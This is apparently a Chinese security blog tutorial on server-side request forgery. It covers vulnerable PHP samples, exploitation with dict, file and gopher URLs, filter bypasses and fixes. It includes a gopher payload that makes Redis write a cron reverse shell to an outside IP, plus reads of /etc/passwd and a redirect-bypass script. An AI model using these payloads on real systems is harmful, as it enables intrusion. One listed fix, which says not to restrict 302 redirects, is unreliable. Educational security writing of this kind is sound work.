SSRF漏洞攻击与防御

0x01 概述

SSRF(Server-side Request Forge, 服务端请求伪造)。
由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。

0x02 SSRF的危害

  1. 扫内网

  2. 向内部任意主机的任意端口发送精心构造的Payload

  3. DOS攻击(请求大文件,始终保持连接Keep-Alive Always)

  4. 攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sqli等)

  5. 利用file协议读取本地文件等

0x03 漏洞利用

CURL支持协议

本地利用

1
2
3
4
5
6
7
8
9
# dict protocol (操作Redis)
curl -vvv 'dict://127.0.0.1:6379/info'

# file protocol (任意文件读取)
curl -vvv 'file:///etc/passwd'

# gopher protocol (一键反弹Bash)
# * 注意: 链接使用单引号,避免$变量问题
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

远程利用

  • 漏洞代码testssrf.php(未作任何SSRF防御)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    <?php
    function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
    }
    $url = $_GET['url'];
    curl($url);
    ?>
  1. 利用file协议读取文件

  2. 利用dict协议查看端口开放
    当端口开放的时候

当端口未开放的时候

回显

  1. 利用gopher协议反弹shell

待更新。。。

  • 漏洞代码testssrf2.php
    限制了只能使用HTTP,HTTPS,设置跳转重定向为True(默认不跳转)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <?php 
    function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
    //限制为HTTP,HTTPS
    curl_setopt($ch,CURLOPT_PROTOCOLS,CURLPROTO_HTTP|CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($url);
    curl_close();
    }

    $url = $_GET['url'];
    curl($url);

    ?>

此时用file、dict等协议就没有用了。
此时可以利用302跳转进行利用

1
2
3
4
5
6
7
8
9
10
11
<?php
$schema = $_GET['s'];
$ip = $_GET['i'];
$port = $_GET['p'];
$query = $_GET['q'];
if(empty($port)){
header("Location: $schema://$ip/$query");
}else{
header("Location: $schema://$ip:$port/$query");
}
?>

0x04 漏洞代码

curl造成的SSRF

1
2
3
4
5
6
7
8
9
10
function curl($url){  
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}

$url = $_GET['url'];
curl($url);

file_get_contents造成的SSRF

1
2
$url = $_GET['url'];
echo file_get_contents($url);

fsockopen造成的SSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
function Getfile($host, $port, $link){
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(!$fp){
echo "$errstr (error number $errno) \n";
}else{
$out = "GET $link HTTP/1.1\r\n";
$out .= "HOST $host \r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$content = '';
while(!feof($fp)){
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}

0x05 常见的过滤与绕过

常见的过滤

  1. 过滤开头不是http://xxx.com的所有链接
  2. 过滤格式为ip的链接,比如127.0.0.1
  3. 结尾必须是某个后缀

绕过方法

  1. http基础认证
    http://xxx.com@attacker.com

  2. 利用302跳转(xip.io,www.tinyrul.com)
    2.1 当我们访问xip.io的子域,比如127.0.0.1.xip.io的时候,实际上会被自动重定向到127.0.0.1
    2.2 如果利用上面的方法会被检测127.0.0.1的话,可以利用www.tinyurl.com提供的服务来进行绕过

  3. 加上#或?即可

4.更改其他进制的ip

0x06 修复方案

修复方案:

• 限制协议为HTTP、HTTPS

• 不用限制302重定向

• 设置URL白名单或者限制内网IP

本文标题:SSRF漏洞攻击与防御

文章作者:Pino-HD

发布时间:2018年05月30日 - 22:05

最后更新:2018年05月30日 - 22:05

原始链接:https://pino-hd.github.io/2018/05/30/SSRF漏洞攻击与防御/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!